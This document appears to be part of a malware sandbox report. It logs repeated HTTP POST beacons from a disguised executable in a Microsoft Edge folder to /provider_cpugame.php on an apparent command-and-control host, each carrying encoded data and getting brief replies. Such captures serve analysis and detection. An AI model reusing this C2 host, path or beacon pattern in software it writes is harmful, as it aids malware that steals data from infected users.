                                                                                                                      Data Raw: 0e 11 25 54 20 2b 00 55 27 3c 39 56 28 1d 09 56 25 06 23 44 38 0e 21 06 25 00 29 17 28 28 35 08 29 0a 2d 13 31 23 2d 1f 33 13 06 0d 26 34 2b 51 03 10 22 1b 26 2d 21 00 24 2f 20 56 24 0d 33 00 22 10 38 40 23 20 22 1d 23 07 2d 57 27 3d 39 51 3e 39 21 12 3d 24 2b 07 3c 08 2c 01 3e 3d 20 52 09 16 26 50 2a 38 2b 0c 33 16 34 1f 2b 5b 38 17 24 28 25 51 28 2d 36 55 2b 10 2f 0f 29 59 27 08 31 0e 22 11 29 2a 3d 19 25 29 3f 08 27 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %T +U'<9V(V%#D8!%)((5)-1#-3&4+Q"&-!$/ V$3"8@# "#-W'=9Q>9!=$+<,>= R&P*8+34+[8$(%Q(-6U+/)Y'1")*=%)?'(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:19:19.683670044 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:20.093246937 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:20.804892063 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:18 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0b 20 05 2d 0c 33 2f 39 51 3f 0d 01 55 25 3c 3c 1c 2c 1e 3d 04 32 3e 17 15 3c 38 2a 1b 29 0a 3a 01 26 23 2d 55 24 13 2f 52 25 0e 2b 51 03 10 22 5c 31 3e 22 13 24 2f 33 0e 33 33 2f 05 22 07 27 1b 22 0d 22 51 21 29 25 57 30 07 3e 09 2a 00 2a 00 2a 24 0e 17 3f 0f 2f 58 29 07 20 52 09 16 25 08 2a 28 30 51 33 01 27 08 28 3e 3c 15 31 06 32 09 29 2e 2e 1d 2b 10 24 56 29 59 20 1b 31 0e 22 11 3e 3a 3a 07 32 3a 3b 0f 30 12 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: & -3/9Q?U%<<,=2><8*):&#-U$/R%+Q"\1>"$/333/"'""Q!)%W0>***$?/X) R%*(0Q3'(><12)..+$V)Y 1">::2:;0&P#-U=VW


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.44973437.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:17:28.328624010 CET287OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 384
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:28.676296949 CET384OUTData Raw: 58 5b 5f 5e 58 5c 54 57 5a 5b 5b 52 55 54 51 50 58 5e 59 43 52 56 54 5c 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X[_^X\TWZ[[RUTQPX^YCRVT\][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\"==?Z)39]$-&X:]:7"($?]08"($18$X52)U$#G!"^,+
                                                                                                                      Dec 20, 2024 21:17:29.608760118 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:29.848563910 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:27 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 11 34 38 31 0c 26 2c 21 51 3c 0d 30 0e 26 2f 01 06 2c 20 22 58 32 3e 35 5e 3c 02 3d 08 3f 20 26 03 31 0d 35 11 24 03 06 0d 24 34 2b 51 03 10 21 04 24 3d 0c 12 33 3c 20 1d 24 1d 2c 59 35 3e 0e 42 36 0d 29 0c 34 3a 3e 0e 27 2e 39 1b 28 3a 3e 02 2b 27 34 5e 2a 21 37 14 3d 3d 20 52 09 16 25 0f 28 3b 28 54 25 38 34 50 28 13 2c 5e 26 28 2d 15 3d 3e 36 56 2b 07 2c 1d 2a 3c 3f 0e 25 23 3d 01 2a 03 25 5a 31 3a 28 51 33 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %481&,!Q<0&/, "X2>5^<=? &15$$4+Q!$=3< $,Y5>B6)4:>'.9(:>+'4^*!7== R%(;(T%84P(,^&(-=>6V+,*<?%#=*%Z1:(Q3&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:29.863013029 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:30.207930088 CET2644OUTData Raw: 5d 5b 5a 54 5d 5a 54 50 5a 5b 5b 52 55 55 51 57 58 58 59 46 52 5c 54 5b 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ][ZT]ZTPZ[[RUUQWXXYFR\T[][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!@>>(?3]36.(: )1=?%8S*!?W2;529W&.#G!"^,/
                                                                                                                      Dec 20, 2024 21:17:30.273545980 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:30.690798044 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:28 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.44973637.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:17:31.148885965 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:31.504317999 CET2644OUTData Raw: 5d 5e 5f 57 5d 5d 54 57 5a 5b 5b 52 55 50 51 5c 58 5d 59 43 52 5c 54 58 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]^_W]]TWZ[[RUPQ\X]YCR\TX][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\")X+X>0-Z3>:24:!(4 $+!V?2?2;,X"193#G!"^,
                                                                                                                      Dec 20, 2024 21:17:32.419121027 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:32.656558990 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:30 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.44973837.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:17:33.110857964 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:33.462671995 CET2644OUTData Raw: 58 5d 5f 50 5d 56 54 5f 5a 5b 5b 52 55 50 51 57 58 5d 59 44 52 5d 54 5a 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X]_P]VT_Z[[RUPQWX]YDR]TZ][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!+.+> &'*\.^4*9)0!W<<%""0#G!"^,
                                                                                                                      Dec 20, 2024 21:17:34.381798983 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:34.616730928 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:32 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.44974337.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:17:37.146848917 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:37.504343033 CET2644OUTData Raw: 5d 5b 5f 55 5d 5b 54 55 5a 5b 5b 52 55 50 51 50 58 5b 59 40 52 56 54 55 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ][_U][TUZ[[RUPQPX[Y@RVTU][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!F==0)3Z'-*91_7\-*4#3^)W<&?5=V'#G!"^,
                                                                                                                      Dec 20, 2024 21:17:38.417773008 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:38.652527094 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:36 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.44974437.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:17:39.047769070 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:39.394994020 CET2644OUTData Raw: 58 5e 5a 54 58 59 51 53 5a 5b 5b 52 55 50 51 50 58 5b 59 48 52 54 54 5e 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X^ZTXYQSZ[[RUPQPX[YHRTT^][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!== * %\3>.,+^#\&[=/Z'(S?3Q&+#1)R&.#G!"^,
                                                                                                                      Dec 20, 2024 21:17:40.342910051 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:40.576973915 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:38 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.44974537.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:17:41.246859074 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2640
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:41.598135948 CET2640OUTData Raw: 58 5f 5f 55 58 5b 51 52 5a 5b 5b 52 55 57 51 5c 58 5f 59 43 52 55 54 5f 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X__UX[QRZ[[RUWQ\X_YCRUT_][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\"=X7>=\$5:]5Y =$<$^!+!$180]""&>#G!"^,
                                                                                                                      Dec 20, 2024 21:17:42.523643017 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:42.756613970 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:40 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.44974737.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:17:43.072679996 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:43.426184893 CET2644OUTData Raw: 5d 5c 5f 5f 58 5b 51 53 5a 5b 5b 52 55 51 51 54 58 5d 59 42 52 52 54 5d 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]\__X[QSZ[[RUQQTX]YBRRT]][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\"),> !$-6_9"4!> 08<?P1]8"2>$>#G!"^,?
                                                                                                                      Dec 20, 2024 21:17:44.355140924 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:44.588921070 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:42 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.2.44974937.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:17:45.077178955 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:45.426261902 CET2644OUTData Raw: 5d 5e 5f 5e 58 5e 54 53 5a 5b 5b 52 55 5f 51 51 58 58 59 42 52 57 54 5f 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]^_^X^TSZ[[RU_QQXXYBRWT_][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!B>.<=3"'=99^4**7X'%T(<%(061!W3>#G!"^,
                                                                                                                      Dec 20, 2024 21:17:46.349710941 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:46.589010954 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:44 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      9192.168.2.44975037.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:17:46.880517006 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:47.238770008 CET2644OUTData Raw: 5d 5e 5f 5f 5d 5a 54 5f 5a 5b 5b 52 55 56 51 53 58 5e 59 48 52 5c 54 58 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]^__]ZT_Z[[RUVQSX^YHR\TX][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\"=4)!X'&.+X#_)$;]38R+1]#51)V'#G!"^,#
                                                                                                                      Dec 20, 2024 21:17:48.172075987 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:48.404563904 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:46 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      10192.168.2.44975137.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:17:48.701858997 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:49.051306963 CET2644OUTData Raw: 5d 5c 5a 53 58 5e 54 5f 5a 5b 5b 52 55 52 51 50 58 5e 59 44 52 50 54 5c 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]\ZSX^T_Z[[RURQPX^YDRPT\][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!F+>=0"'!-#1= %8S<(';#1&>#G!"^,3
                                                                                                                      Dec 20, 2024 21:17:49.978621006 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:50.212682009 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:48 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      11192.168.2.44975237.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:17:50.469784975 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:50.816941023 CET2644OUTData Raw: 5d 5d 5a 52 58 5b 51 57 5a 5b 5b 52 55 53 51 51 58 59 59 46 52 57 54 55 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]]ZRX[QWZ[[RUSQQXYYFRWTU][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!A>>0)'>!:;7(440+)<(&(?523#G!"^,7
                                                                                                                      Dec 20, 2024 21:17:51.746090889 CET25INHTTP/1.1 100 Continue
